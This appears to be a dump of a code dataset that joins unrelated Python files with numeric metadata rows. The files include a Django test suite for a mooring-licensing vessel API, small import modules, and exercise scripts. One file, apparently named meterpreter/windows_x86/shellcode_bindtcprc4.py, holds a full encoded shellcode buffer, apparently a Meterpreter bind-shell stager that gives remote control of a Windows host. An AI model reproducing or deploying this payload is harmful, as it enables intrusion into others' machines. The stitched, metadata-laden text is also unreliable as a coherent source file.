from mooringlicensing.settings import HTTP_HOST_FOR_TEST from mooringlicensing.tests.test_setup import APITestSetup from mooringlicensing.components.proposals.models import MooringBay, Proposal, Vessel from mooringlicensing.components.proposals.utils import proposal_submit from datetime import datetime import pytz from ledger.settings_base import TIME_ZONE #from mooringlicensing.tests.test_manage_vessels import ManageVesselTests class VesselTests(APITestSetup): #def test_proposal_wla_vessel_logic(self): #self.wla_vessel_logic() def test_create_bare_vessel_add_to_proposal(self): create_vessel_data = { 'vessel': { 'new_vessel': True, 'rego_no': '20210503_1', 'vessel_details': { 'read_only': False, 'vessel_name': '20210503_1', 'berth_mooring': 'home', 'vessel_length': '23', 'vessel_overall_length': '34', 'vessel_weight': '45', 'vessel_draft': '56', 'vessel_type': 'tender' }, 'vessel_ownership': { 'registered_owner': 'current_user', 'individual_owner': True, 'percentage': '35' } } } self.client.login(email=self.customer1, password='pass') self.client.enforce_csrf_checks=True create_response = self.client.post( '/api/vessel/', #self.create_proposal_data, create_vessel_data, format='json', HTTP_HOST=HTTP_HOST_FOR_TEST, ) #vessel_details_id_1 = create_response.data.get('vessel_details').get('id') vessel_id_1 = create_response.data.get('id') vessel = Vessel.objects.get(id=vessel_id_1) vessel_details_id_1 = vessel.latest_vessel_details.id #import ipdb; ipdb.set_trace() #manage_vessel_test_cases = ManageVesselTests() #vessel_id_1, vessel_details_id_1 = manage_vessel_test_cases.test_manage_vessels() ## vessel is now in 'draft' status #vessel_details_id_1 = proposal.vessel_details.id #vessel_ownership_id_1 = proposal.vessel_ownership.id #vessel_id_1 = proposal.vessel_details.vessel_id ## Proposal 2 - add vessel from Proposal create_response_2 = self.client.post( '/api/waitinglistapplication/', #self.create_proposal_data, format='json', HTTP_HOST=HTTP_HOST_FOR_TEST, ) self.assertEqual(create_response_2.status_code, 200) self.assertTrue(create_response_2.data.get('id') > 0) proposal_2_id = create_response_2.data.get('id') # get proposal url2 = 'http://localhost:8071/api/proposal/{}.json'.format(proposal_2_id) get_response_2 = self.client.get(url2, HTTP_HOST=HTTP_HOST_FOR_TEST,) self.assertEqual(get_response_2.status_code, 200) # save Proposal2 draft_proposal_data = { "proposal": {}, "vessel": { "vessel_details": { "id": vessel_details_id_1 }, "vessel_ownership": { #"id": vessel_ownership_id_1 }, "id": vessel_id_1, "read_only": True, } } draft_response = self.client.post( '/api/proposal/{}/draft/'.format(proposal_2_id), draft_proposal_data, format='json', HTTP_HOST=HTTP_HOST_FOR_TEST, ) self.assertEqual(draft_response.status_code, 302) ## add DoT rego papers rego_papers_response = self.client.post( '/api/proposal/{}/process_vessel_registration_document/'.format(proposal_2_id), self.rego_papers_data, #format='json', HTTP_HOST=HTTP_HOST_FOR_TEST, ) self.assertEqual(rego_papers_response.status_code, 200) # submit Proposal2 # submit api endpoint submit_proposal_2_data = { "proposal": { "preferred_bay_id": MooringBay.objects.last().id, "silent_elector": False, }, "vessel": { "vessel_details": { "id": vessel_details_id_1 }, "vessel_ownership": { #"id": vessel_ownership_id_1 "org_name": "Company1", "percentage": "65", # increase to 66 to cause serializer validation error "individual_owner": False }, "id": vessel_id_1, "read_only": True, } } submit_2_response = self.client.post( '/api/proposal/{}/submit/'.format(proposal_2_id), submit_proposal_2_data, format='json', HTTP_HOST=HTTP_HOST_FOR_TEST, ) self.assertEqual(submit_2_response.status_code, 200) ### proposal_submit(instance, request) - need a request obj, so we just make changes manually here #proposal_2 = Proposal.objects.get(id=proposal_2_id) #proposal_2.lodgement_date = datetime.now(pytz.timezone(TIME_ZONE)) #proposal_2.processing_status = 'with_assessor' #proposal_2.customer_status = 'with_assessor' #proposal_2.save() ## proposal and proposal2 should now share the same vessel_details #self.assertEqual(proposal.vessel_details, proposal_2.vessel_details) #self.assertEqual(proposal.vessel_ownership.vessel, proposal_2.vessel_ownership.vessel) #self.assertNotEqual(proposal.vessel_ownership, proposal_2.vessel_ownership) def test_proposal_wla_vessel_logic(self): #def wla_vessel_logic(self): print("test_proposal_wla_vessel_logic") self.client.login(email=self.customer, password='pass') self.client.enforce_csrf_checks=True create_response = self.client.post( '/api/waitinglistapplication/', #self.create_proposal_data, format='json', HTTP_HOST=HTTP_HOST_FOR_TEST, ) self.assertEqual(create_response.status_code, 200) self.assertTrue(create_response.data.get('id') > 0) proposal_id = create_response.data.get('id') # get proposal url = 'http://localhost:8071/api/proposal/{}.json'.format(proposal_id) get_response = self.client.get(url, HTTP_HOST=HTTP_HOST_FOR_TEST,) self.assertEqual(get_response.status_code, 200) ####################### draft_proposal_data = { "proposal": {}, "vessel": { "vessel_details": { "vessel_type": "cabin_cruiser", "vessel_name": "gfhj", "vessel_overall_length": "45", "vessel_length": "34", "vessel_draft": "67", "vessel_beam": "0.00", "vessel_weight": "56", "berth_mooring": "fghx" }, "vessel_ownership": { "org_name": None, "percentage": "26", "individual_owner": None }, "rego_no": "20210407_1", "vessel_id": None } } draft_response = self.client.post( '/api/proposal/{}/draft/'.format(proposal_id), draft_proposal_data, format='json', HTTP_HOST=HTTP_HOST_FOR_TEST, ) self.assertEqual(draft_response.status_code, 302) ## add DoT rego papers rego_papers_response = self.client.post( '/api/proposal/{}/process_vessel_registration_document/'.format(proposal_id), self.rego_papers_data, #format='json', HTTP_HOST=HTTP_HOST_FOR_TEST, ) self.assertEqual(rego_papers_response.status_code, 200) ## add Silent Elector papers electoral_roll_doc_response = self.client.post( '/api/proposal/{}/process_electoral_roll_document/'.format(proposal_id), self.electoral_roll_doc_data, #format='json', HTTP_HOST=HTTP_HOST_FOR_TEST, ) self.assertEqual(electoral_roll_doc_response.status_code, 200) ## submit api endpoint #submit_proposal_data = { # "proposal": { # "preferred_bay_id": MooringBay.objects.first().id, # } # } submit_proposal_data = { "proposal": { "silent_elector": True, "preferred_bay_id": MooringBay.objects.first().id, }, "vessel": { "vessel_details": { "vessel_type": "cabin_cruiser", "vessel_name": "gfhj", "vessel_overall_length": "45", "vessel_length": "34", "vessel_draft": "67", "vessel_beam": "0.00", "vessel_weight": "56", "berth_mooring": "fghx" }, "vessel_ownership": { "org_name": None, "percentage": "26", "individual_owner": True }, "rego_no": "20210407_1", "vessel_id": None } } submit_response = self.client.post( '/api/proposal/{}/submit/'.format(proposal_id), submit_proposal_data, format='json', HTTP_HOST=HTTP_HOST_FOR_TEST, ) self.assertEqual(submit_response.status_code, 200) ## proposal_submit(instance, request) - need a request obj, so we just make changes manually here proposal = Proposal.objects.get(id=proposal_id) proposal.lodgement_date = datetime.now(pytz.timezone(TIME_ZONE)) proposal.processing_status = 'with_assessor' proposal.customer_status = 'with_assessor' proposal.save() ## vessel is now in 'draft' status vessel_details_id_1 = proposal.vessel_details.id vessel_ownership_id_1 = proposal.vessel_ownership.id vessel_id_1 = proposal.vessel_details.vessel_id ## Proposal 2 - add vessel from Proposal create_response_2 = self.client.post( '/api/waitinglistapplication/', #self.create_proposal_data, format='json', HTTP_HOST=HTTP_HOST_FOR_TEST, ) self.assertEqual(create_response_2.status_code, 200) self.assertTrue(create_response_2.data.get('id') > 0) proposal_2_id = create_response_2.data.get('id') # get proposal url2 = 'http://localhost:8071/api/proposal/{}.json'.format(proposal_2_id) get_response_2 = self.client.get(url2, HTTP_HOST=HTTP_HOST_FOR_TEST,) self.assertEqual(get_response_2.status_code, 200) # save Proposal2 draft_proposal_data = { "proposal": {}, "vessel": { "vessel_details": { "id": vessel_details_id_1 }, "vessel_ownership": { #"id": vessel_ownership_id_1 }, "id": vessel_id_1, "read_only": True, } } draft_response = self.client.post( '/api/proposal/{}/draft/'.format(proposal_2_id), draft_proposal_data, format='json', HTTP_HOST=HTTP_HOST_FOR_TEST, ) self.assertEqual(draft_response.status_code, 302) ## add DoT rego papers rego_papers_response = self.client.post( '/api/proposal/{}/process_vessel_registration_document/'.format(proposal_2_id), self.rego_papers_data, #format='json', HTTP_HOST=HTTP_HOST_FOR_TEST, ) self.assertEqual(rego_papers_response.status_code, 200) # submit Proposal2 # submit api endpoint submit_proposal_2_data = { "proposal": { "preferred_bay_id": MooringBay.objects.last().id, "silent_elector": False, }, "vessel": { "vessel_details": { "id": vessel_details_id_1 }, "vessel_ownership": { #"id": vessel_ownership_id_1 "org_name": "Company1", "percentage": "26", "individual_owner": False }, "id": vessel_id_1, "read_only": True, } } submit_2_response = self.client.post( '/api/proposal/{}/submit/'.format(proposal_2_id), submit_proposal_2_data, format='json', HTTP_HOST=HTTP_HOST_FOR_TEST, ) self.assertEqual(submit_2_response.status_code, 200) ## proposal_submit(instance, request) - need a request obj, so we just make changes manually here proposal_2 = Proposal.objects.get(id=proposal_2_id) proposal_2.lodgement_date = datetime.now(pytz.timezone(TIME_ZONE)) proposal_2.processing_status = 'with_assessor' proposal_2.customer_status = 'with_assessor' proposal_2.save() # proposal and proposal2 should now share the same vessel_details self.assertEqual(proposal.vessel_details, proposal_2.vessel_details) self.assertEqual(proposal.vessel_ownership.vessel, proposal_2.vessel_ownership.vessel) self.assertNotEqual(proposal.vessel_ownership, proposal_2.vessel_ownership)
40.259563
106
0.532813
1,413
14,735
5.20736
0.121019
0.038054
0.026909
0.036695
0.833107
0.792607
0.782006
0.732536
0.726284
0.706986
0
0.024609
0.371225
14,735
365
107
40.369863
0.769563
0.152426
0
0.558052
0
0
0.15027
0.042692
0
0
0
0
0.082397
1
0.007491
false
0.007491
0.026217
0
0.037453
0.003745
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
cf87f5c8e02f38ea8f3193bac50bb2b12e7a1fd6
187
py
Python
landlab/plot/network_sediment_transporter/__init__.py
amanaster2/landlab
ea17f8314eb12e3fc76df66c9b6ff32078caa75c
[ "MIT" ]
257
2015-01-13T16:01:21.000Z
2022-03-29T22:37:43.000Z
landlab/plot/network_sediment_transporter/__init__.py
amanaster2/landlab
ea17f8314eb12e3fc76df66c9b6ff32078caa75c
[ "MIT" ]
1,222
2015-02-05T21:36:53.000Z
2022-03-31T17:53:49.000Z
landlab/plot/network_sediment_transporter/__init__.py
amanaster2/landlab
ea17f8314eb12e3fc76df66c9b6ff32078caa75c
[ "MIT" ]
274
2015-02-11T19:56:08.000Z
2022-03-28T23:31:07.000Z
# -*- coding: utf-8 -*- """ Created on Tue Jun 18 14:22:27 2019 @author: pfeif """ from .plot_network_and_parcels import plot_network_and_parcels __all__ = ["plot_network_and_parcels"]
18.7
62
0.73262
29
187
4.275862
0.724138
0.266129
0.33871
0.508065
0
0
0
0
0
0
0
0.080247
0.13369
187
9
63
20.777778
0.685185
0.395722
0
0
0
0
0.228571
0.228571
0
0
0
0
0
1
0
false
0
0.5
0
0.5
0
1
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
6
d867db88e4ca21f6719c78ccee656b292d5cb54d
87
py
Python
rin/models/builders/__init__.py
an-dyy/Rin
70066f04157a20a08cfe65ce9235ce65d35f8be3
[ "MIT" ]
13
2022-01-15T17:29:17.000Z
2022-02-17T05:43:39.000Z
rin/models/builders/__init__.py
an-dyy/Rin
70066f04157a20a08cfe65ce9235ce65d35f8be3
[ "MIT" ]
3
2022-01-16T18:05:58.000Z
2022-02-18T03:55:50.000Z
rin/models/builders/__init__.py
an-dyy/Rin
70066f04157a20a08cfe65ce9235ce65d35f8be3
[ "MIT" ]
6
2022-01-16T16:45:45.000Z
2022-02-12T18:49:20.000Z
from .ansi import * from .embed import * from .intents import * from .message import *
17.4
22
0.724138
12
87
5.25
0.5
0.47619
0
0
0
0
0
0
0
0
0
0
0.183908
87
4
23
21.75
0.887324
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
d886d8769ff3fc634a5efc50044c8c5b5c253a34
125
py
Python
psql/students/views.py
Dickens-odera/Django-postgreSQL
3d169e5146b72ee0c70872f9bcaa68d83bb4d145
[ "MIT" ]
4
2019-03-09T21:51:33.000Z
2019-03-12T13:59:24.000Z
psql/students/views.py
Dickens-odera/Django-postgreSQL
3d169e5146b72ee0c70872f9bcaa68d83bb4d145
[ "MIT" ]
21
2020-01-28T22:37:42.000Z
2022-03-11T23:42:12.000Z
psql/students/views.py
Dickens-odera/Django-postgreSQL
3d169e5146b72ee0c70872f9bcaa68d83bb4d145
[ "MIT" ]
null
null
null
from django.shortcuts import render from django.views import View class Student(View): # default constructor pass
17.857143
35
0.752
16
125
5.875
0.75
0.212766
0
0
0
0
0
0
0
0
0
0
0.2
125
6
36
20.833333
0.94
0.152
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0.25
0.5
0
0.75
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
1
1
0
0
0
0
6
d8a1c0d4af343154a7b6e862553ccd0f9afc6287
35
py
Python
munimap/__init__.py
MrSnyder/bielefeldGEOCLIENT
17c78b43fc2055d23a1bc4b5091da164756bf767
[ "Apache-2.0" ]
2
2022-02-07T13:20:45.000Z
2022-02-14T21:40:06.000Z
munimap/__init__.py
MrSnyder/bielefeldGEOCLIENT
17c78b43fc2055d23a1bc4b5091da164756bf767
[ "Apache-2.0" ]
4
2021-06-17T07:53:53.000Z
2021-12-17T10:55:48.000Z
munimap/__init__.py
MrSnyder/bielefeldGEOCLIENT
17c78b43fc2055d23a1bc4b5091da164756bf767
[ "Apache-2.0" ]
2
2021-06-01T09:41:55.000Z
2022-02-14T17:33:33.000Z
from .application import create_app
35
35
0.885714
5
35
6
1
0
0
0
0
0
0
0
0
0
0
0
0.085714
35
1
35
35
0.9375
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
d8cecb88a76ac706a809e4cc08eab584a400780c
95
py
Python
testproj/models.py
SweetProcess/django-postgres-queue
55486edd311605ce9da43b330a097effc9d8d0c4
[ "BSD-2-Clause" ]
12
2020-02-28T10:13:16.000Z
2022-02-07T13:02:42.000Z
testproj/models.py
SweetProcess/django-postgres-queue
55486edd311605ce9da43b330a097effc9d8d0c4
[ "BSD-2-Clause" ]
7
2020-04-29T07:10:06.000Z
2022-02-18T04:47:14.000Z
testproj/models.py
SweetProcess/django-postgres-queue
55486edd311605ce9da43b330a097effc9d8d0c4
[ "BSD-2-Clause" ]
2
2020-04-29T01:07:58.000Z
2020-07-24T07:34:50.000Z
from django.db import models from pgq.models import BaseJob class AltJob(BaseJob): pass
11.875
30
0.757895
14
95
5.142857
0.714286
0
0
0
0
0
0
0
0
0
0
0
0.189474
95
7
31
13.571429
0.935065
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0.25
0.5
0
0.75
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
1
1
0
1
0
0
6
d8f4296e2254125124f067ff59d13993bf9ff9fb
44
py
Python
_ED/_ED_exercicios_lista_01/A_e_B_soma.py
CarlosJunn/Aprendendo_Python
cddb29b5ee2058c3fb612574eb4af414770b7422
[ "MIT" ]
null
null
null
_ED/_ED_exercicios_lista_01/A_e_B_soma.py
CarlosJunn/Aprendendo_Python
cddb29b5ee2058c3fb612574eb4af414770b7422
[ "MIT" ]
null
null
null
_ED/_ED_exercicios_lista_01/A_e_B_soma.py
CarlosJunn/Aprendendo_Python
cddb29b5ee2058c3fb612574eb4af414770b7422
[ "MIT" ]
null
null
null
def soma(var1, var2): print(var1 + var2)
22
22
0.636364
7
44
4
0.714286
0.571429
0
0
0
0
0
0
0
0
0
0.114286
0.204545
44
2
22
22
0.685714
0
0
0
0
0
0
0
0
0
0
0
0
1
0.5
false
0
0
0
0.5
0.5
1
1
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
1
0
6
d8f51b1a28eed2fc2cb6f5a816793efa909e560a
44
py
Python
light_cnns/ShuffleNet/__init__.py
murufeng/awesome_lightweight_networks
dfa19bd7ee491a7b7ade360175244c81b3c0e322
[ "MIT" ]
318
2021-08-15T10:33:27.000Z
2022-03-31T16:42:50.000Z
light_cnns/ShuffleNet/__init__.py
x779250919/awesome_lightweight_networks
dfa19bd7ee491a7b7ade360175244c81b3c0e322
[ "MIT" ]
6
2021-11-16T06:27:34.000Z
2022-02-08T07:57:52.000Z
light_cnns/ShuffleNet/__init__.py
x779250919/awesome_lightweight_networks
dfa19bd7ee491a7b7ade360175244c81b3c0e322
[ "MIT" ]
67
2021-11-01T13:06:48.000Z
2022-03-24T12:59:41.000Z
from .blocks import * from .models import *
22
22
0.727273
6
44
5.333333
0.666667
0
0
0
0
0
0
0
0
0
0
0
0.181818
44
2
23
22
0.888889
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
2b11c153be4b8832c6040020cb7d31f81bd55212
177
py
Python
python/testData/inspections/AddCallSuperCommentAfterColonPreserved_after.py
jnthn/intellij-community
8fa7c8a3ace62400c838e0d5926a7be106aa8557
[ "Apache-2.0" ]
2
2019-04-28T07:48:50.000Z
2020-12-11T14:18:08.000Z
python/testData/inspections/AddCallSuperCommentAfterColonPreserved_after.py
Cyril-lamirand/intellij-community
60ab6c61b82fc761dd68363eca7d9d69663cfa39
[ "Apache-2.0" ]
173
2018-07-05T13:59:39.000Z
2018-08-09T01:12:03.000Z
python/testData/inspections/AddCallSuperCommentAfterColonPreserved_after.py
Cyril-lamirand/intellij-community
60ab6c61b82fc761dd68363eca7d9d69663cfa39
[ "Apache-2.0" ]
2
2020-03-15T08:57:37.000Z
2020-04-07T04:48:14.000Z
class Example1: def __init__(self): self.field1 = 1 class Example2(Example1): def __init__(self): # Some valuable comment here Example1.__init__(self)
22.125
53
0.666667
21
177
5.047619
0.571429
0.226415
0.283019
0.358491
0
0
0
0
0
0
0
0.044776
0.242938
177
8
54
22.125
0.746269
0.146893
0
0.333333
0
0
0
0
0
0
0
0
0
1
0.333333
false
0
0
0
0.666667
0
1
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
6
991a18d03a14e31eda4cb23c385430ed43c9548f
584
py
Python
erri/python/lesson_51/divisibility.py
TGITS/programming-workouts
799e805ccf3fd0936ec8ac2417f7193b8e9bcb55
[ "MIT" ]
null
null
null
erri/python/lesson_51/divisibility.py
TGITS/programming-workouts
799e805ccf3fd0936ec8ac2417f7193b8e9bcb55
[ "MIT" ]
16
2020-05-30T12:38:13.000Z
2022-02-19T09:23:31.000Z
erri/python/lesson_51/divisibility.py
TGITS/programming-workouts
799e805ccf3fd0936ec8ac2417f7193b8e9bcb55
[ "MIT" ]
null
null
null
def numbers_divisible_by_5_and_7_between_values(start_value, end_value): result = [] for e in range(start_value, end_value + 1, 5): if e % 7 == 0: result.append(e) return result def numbers_divisible_by_5_and_13_between_values(start_value, end_value): result = [] for e in range(start_value, end_value + 1, 5): if e % 13 == 0: result.append(e) return result if __name__ == "__main__": print(numbers_divisible_by_5_and_7_between_values(300, 450)) print(numbers_divisible_by_5_and_13_between_values(300, 450))
29.2
73
0.683219
91
584
3.901099
0.307692
0.180282
0.202817
0.214085
0.929577
0.929577
0.738028
0.738028
0.4
0.4
0
0.068282
0.222603
584
19
74
30.736842
0.713656
0
0
0.533333
0
0
0.013699
0
0
0
0
0
0
1
0.133333
false
0
0
0
0.266667
0.133333
0
0
0
null
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
51524a18696e566854cad187baecc6f9f444c5a9
137
py
Python
minato_namikaze/bot_files/lib/functions/__init__.py
ooliver1/yondaime-hokage
3552887dc022c8ace13de9dae01392b9471e5f58
[ "Apache-2.0" ]
1
2021-11-04T13:20:36.000Z
2021-11-04T13:20:36.000Z
minato_namikaze/bot_files/lib/functions/__init__.py
ooliver1/yondaime-hokage
3552887dc022c8ace13de9dae01392b9471e5f58
[ "Apache-2.0" ]
null
null
null
minato_namikaze/bot_files/lib/functions/__init__.py
ooliver1/yondaime-hokage
3552887dc022c8ace13de9dae01392b9471e5f58
[ "Apache-2.0" ]
null
null
null
from .meek_moe import * from .moderation import * from .owneronly import * from .tools import * from .user import * from .votes import *
19.571429
25
0.737226
19
137
5.263158
0.473684
0.5
0
0
0
0
0
0
0
0
0
0
0.175182
137
6
26
22.833333
0.884956
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
5acfc300def397c83d7759b0f2da4ebf3d019307
75
py
Python
boomdiff/__init__.py
team-boomeraang/cs107-FinalProject
93d854ea2c6dd3a8de68eeacc0bb31f412dbb94a
[ "MIT" ]
null
null
null
boomdiff/__init__.py
team-boomeraang/cs107-FinalProject
93d854ea2c6dd3a8de68eeacc0bb31f412dbb94a
[ "MIT" ]
17
2020-10-05T23:55:45.000Z
2020-12-11T00:25:55.000Z
boomdiff/__init__.py
team-boomeraang/cs107-FinalProject
93d854ea2c6dd3a8de68eeacc0bb31f412dbb94a
[ "MIT" ]
2
2020-12-08T22:13:40.000Z
2021-12-09T04:39:45.000Z
from .autodiff import AD from . import optimize from . import loss_function
25
27
0.813333
11
75
5.454545
0.636364
0.333333
0
0
0
0
0
0
0
0
0
0
0.146667
75
3
27
25
0.9375
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
5ad84beee014aae6de8a2c4d64e5d9db308890c2
3,267
py
Python
meterpreter/windows_x86/shellcode_bindtcprc4.py
cobranail/redteam
a21091ac0aef289b61dd05771fff7296fb7c4e7e
[ "MIT" ]
null
null
null
meterpreter/windows_x86/shellcode_bindtcprc4.py
cobranail/redteam
a21091ac0aef289b61dd05771fff7296fb7c4e7e
[ "MIT" ]
null
null
null
meterpreter/windows_x86/shellcode_bindtcprc4.py
cobranail/redteam
a21091ac0aef289b61dd05771fff7296fb7c4e7e
[ "MIT" ]
null
null
null
buf = b"" buf += b"\x48\x31\xc9\x48\x81\xe9\xb1\xff\xff\xff\x48\x8d\x05" buf += b"\xef\xff\xff\xff\x48\xbb\xf8\x3d\x59\x54\x46\x6d\x59" buf += b"\x99\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4" buf += b"\x04\x75\xda\xb0\xb6\x85\x95\x99\xf8\x3d\x18\x05\x07" buf += b"\x3d\x0b\xc8\xae\x75\x68\x86\x23\x25\xd2\xcb\x98\x75" buf += b"\xd2\x06\x5e\x25\xd2\xcb\xd8\x75\xd2\x26\x16\x25\x56" buf += b"\x2e\xb2\x77\x14\x65\x8f\x25\x68\x59\x54\x01\x38\x28" buf += b"\x44\x41\x79\xd8\x39\xf4\x54\x15\x47\xac\xbb\x74\xaa" buf += b"\x7c\x08\x1c\xcd\x3f\x79\x12\xba\x01\x11\x55\x96\x0b" buf += b"\xd8\xe1\xe0\x36\x5b\x5b\xc3\x1f\x59\x99\xf8\xb6\xd9" buf += b"\xdc\x46\x6d\x59\xd1\x7d\xfd\x2d\x33\x0e\x6c\x89\xc9" buf += b"\x73\x75\x41\x10\xcd\x2d\x79\xd0\xf9\xed\xba\x02\x0e" buf += b"\x92\x90\xd8\x73\x09\xd1\x1c\x47\xbb\x14\xa8\x31\x75" buf += b"\x68\x94\xea\x2c\x98\x50\xf5\x7c\x58\x95\x7e\x8d\x2c" buf += b"\x68\xb4\x3e\x15\x70\x4e\x28\x60\x48\x8d\xe5\x01\x10" buf += b"\xcd\x2d\x7d\xd0\xf9\xed\x3f\x15\xcd\x61\x11\xdd\x73" buf += b"\x7d\x45\x1d\x47\xbd\x18\x12\xfc\xb5\x11\x55\x96\x2c" buf += b"\x01\xd8\xa0\x63\x00\x0e\x07\x35\x18\xc0\xb9\x67\x11" buf += b"\xd7\xaa\x4d\x18\xcb\x07\xdd\x01\x15\x1f\x37\x11\x12" buf += b"\xea\xd4\x12\xab\xb9\x92\x04\xd0\x46\x4a\x2a\x66\x19" buf += b"\x5e\x6b\x99\xf8\x7c\x0f\x1d\xcf\x8b\x11\x18\x14\x9d" buf += b"\x58\x54\x46\x24\xd0\x7c\xb0\x0c\x99\x04\x16\x24\xe5" buf += b"\x9b\xf8\x1d\xa9\x54\x46\x6d\x59\xd8\xac\x74\xd0\xb0" buf += b"\x0a\xe4\xa8\xd8\x42\x71\x2e\x72\x41\x92\x8c\xd5\x71" buf += b"\xd7\x31\x55\x47\x6d\x59\xc0\xb9\x87\x70\xd4\x2d\x6d" buf += b"\xa6\x4c\x92\x3f\x00\x04\x16\x20\x68\x50\xb5\x0c\x99" buf += b"\x1c\xb9\xad\x11\x10\x3a\x7c\xe3\xbe\x49\xb2\xb9\x66" buf += b"\x2d\x75\xd0\x93\x2c\x7d\x18\xc1\xb4\xb4\xbb\x1c\xcf" buf += b"\x94\x18\x23\x3a\xe6\x6e\x33\xb9\xb8\x11\xa8\x2a\x75" buf += b"\xd0\xad\x07\xd7\xee\x70\xc0\xc2\xa6\x81\x0b\x5c\x99" buf += b"\xd1\xc9\xef\x11\xdd\xbf\x2c\xe3\xed\x14\x06\xb8\xab" buf += b"\x93\x25\xd0\x60\xb0\xb4\x9e\x15\xfc\x18\x37\xd4\x99" buf += b"\xc2\x8c\x1c\xc7\xa9\xe9\x9b\xf8\x3d\x11\xd7\xaa\x7d" buf += b"\x11\x10\x1a\x70\x68\x9d\x2c\x69\x18\xc1\xb0\xb4\xa0" buf += b"\x15\xfc\x6f\x80\x51\xa7\xc2\x8c\x1c\xc5\xa9\x79\xc7" buf += b"\x71\xcb\xd8\xa2\x74\xd6\x41\x2f\xb4\xb0\xc7\x54\x47" buf += b"\x6d\x59\xf3\xb8\x7c\x00\x3c\x46\x7d\x59\x99\xb9\x65" buf += b"\x11\xdd\xb4\x25\x68\x50\xb9\x87\x01\xf0\x15\x88\xa6" buf += b"\x4c\xb0\xb0\xc1\x54\x47\x6d\x59\xd0\x71\xe2\x0a\x02" buf += b"\x16\x20\x68\x50\xb1\xb4\xa9\x1c\xcf\xb7\x11\x10\x01" buf += b"\x7c\xe3\x56\x9f\xa5\x06\x66\x2d\x75\xda\x90\x66\x25" buf += b"\x58\x5a\xb0\x14\x9f\x21\xa6\x24\xd0\x67\xa7\x64\x18" buf += b"\x0d\x07\x3b\xb1\x89\xf8\x3d\x59\x79\x16\xf6\x59\xa1" buf += b"\xb0\xe2\xd3\xf9\xc5\xba\x57\x09\x5d\xf3\xde\x0a\x0e" buf += b"\x5c\x99\xd0\x71\xc5\xf3\xaa\x86\x18\xa2\xd1\xc9\xe6" buf += b"\x18\x56\x5a\x6d\x11\x10\x3a\xbd\xbb\x5b\x44\x71\x4f" buf += b"\xd8\x72\x29\x59\x15\xc0\x79\x41\xd8\x70\x29\x59\xaa" buf += b"\x86\x18\xba\xd1\xc9\xe6\xa7\x94\x07\x6f\x45\x99\xb9" buf += b"\xb7\x4d\x54\x07\xeb\x4d\x81\xb9\xb5\x4d\x54\x07\x6f" buf += b"\x4d\x81\xb9\xb7\x4d\x44\x07\x5d\x48\xd0\x07\xfc\x11" buf += b"\xab\x8f\x18\x82\xc6\xb9\xc2\xbe\x0c\x2c\x6d\x00\xd0" buf += b"\x3f\xff\xa9\xe1\xe4\x3b\xa6\x4c"
60.5
62
0.681053
777
3,267
2.863578
0.266409
0.095281
0.012135
0.010787
0
0
0
0
0
0
0
0.289025
0.048975
3,267
53
63
61.641509
0.4271
0
0
0
0
0.962264
0.821549
0.821549
0
1
0
0
0
1
0
false
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
1
0
0
0
0
1
1
1
null
1
0
0
0
0
0
0
0
0
0
0
0
0
6
8506de82d6055b04a2943e77fdb439071ce4d984
217
py
Python
2016/Day3/day3.py
dh256/adventofcode
428eec13f4cbf153333a0e359bcff23070ef6d27
[ "MIT" ]
null
null
null
2016/Day3/day3.py
dh256/adventofcode
428eec13f4cbf153333a0e359bcff23070ef6d27
[ "MIT" ]
null
null
null
2016/Day3/day3.py
dh256/adventofcode
428eec13f4cbf153333a0e359bcff23070ef6d27
[ "MIT" ]
null
null
null
from Triangles import Triangles triangles = Triangles("input.txt") print(f'Part 1 Possible Triangles = {triangles.possible(columns=False)}') print(f'Part 2 Possible Triangles = {triangles.possible(columns=True)}')
27.125
73
0.769585
28
217
5.964286
0.5
0.431138
0.11976
0.407186
0.491018
0
0
0
0
0
0
0.010256
0.101382
217
7
74
31
0.846154
0
0
0
0
0
0.623256
0.32093
0
0
0
0
0
1
0
false
0
0.25
0
0.25
0.5
1
0
0
null
1
0
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
1
0
null
0
0
0
0
0
0
0
0
0
0
0
1
0
6
